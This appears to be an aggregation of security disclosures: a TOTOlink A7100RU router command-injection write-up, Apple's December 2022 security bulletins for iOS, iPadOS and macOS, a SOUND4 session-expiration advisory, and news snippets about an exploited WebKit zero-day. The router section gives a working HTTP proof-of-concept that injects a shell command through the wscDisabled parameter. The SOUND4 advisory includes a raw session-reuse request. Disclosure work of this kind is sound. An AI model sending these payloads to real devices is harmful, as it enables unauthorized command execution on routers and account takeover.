TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

Released December 13, 2022

**AppleAVD**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AVEVideoEncoder**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**File System**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Graphics Driver**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**IOHIDFamily**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**iTunes Store**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

**ppp**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Safari**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

Released December 13, 2022

**Accounts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AppleAVD**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen University

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42850: Willy R. Vasquez of The University of Texas at Austin

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42851: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**iTunes Store**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2022-42844: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Software Update**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to elevate privileges

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2022-42849: Mickey Jin (@patch1t)

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

CVE-2022-46702: About the security content of iOS 16.2 and iPadOS 16.2

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.

Released December 13, 2022

**Accounts**

Available for: macOS Ventura

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AMD**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-42847: ABC Research s.r.o.

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**Bluetooth**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Boot Camp**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**DriverKit**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic (@antoniozekic)

**iTunes Store**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: macOS Ventura

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: macOS Ventura

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: macOS Ventura

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Ruby**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-24836

CVE-2022-29181

**Safari**

Available for: macOS Ventura

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

**xar**

Available for: macOS Ventura

Impact: Processing a maliciously crafted package may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved checks.

CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

CVE-2022-46701: About the security content of macOS Ventura 13.1

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffers from an insufficient session expiration vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session ExpirationVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: 4.1.102Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers an insufficient session expiration. Thisoccurs when the web application permits an attacker to reuse old sessioncredentials or session IDs for authorization. Insufficient session expirationincreases the device's exposure to attacks that can steal or reuse user'ssession identifiers.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5724Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php26.09.2022--Session valid after 96 hours:POST /checklogin.php HTTP/1.1Host: RADIOCookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0Content-Length: 34Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://RADIOSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://RADIO/linkandshare.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closesession=q9rooqkl3kl20aianmveimu23qHTTP/1.1 200 OKDate: Sat, 03 Jan 1970 11:13:19 GMTServer: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1X-Powered-By: PHP/7.1.1Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheVary: User-AgentContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-80

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Insufficient Session Expiration

Without many details, Apple patches a vulnerability that has been exploited in the wild to execute code.

The latest Apple security update includes a fix for an actively exploited security vulnerability that could allow arbitrary code execution on iPhone 8 and above. 

The bug, fixed with the iOS 16.1.2 update, is a type confusion issue in the WebKit browser engine. Type confusion occurs when a piece of code doesn't verify the type of object that is passed to it; in this case, it can be be triggered when processing specially crafted content, Apple noted in its advisory. 

As for the active exploitation, the mobile giant noted that it is "aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1."

Apple has been plagued by zero-day exploits over the past several months.  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Apple Zero-Day Actively Exploited on iPhone 15

Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.
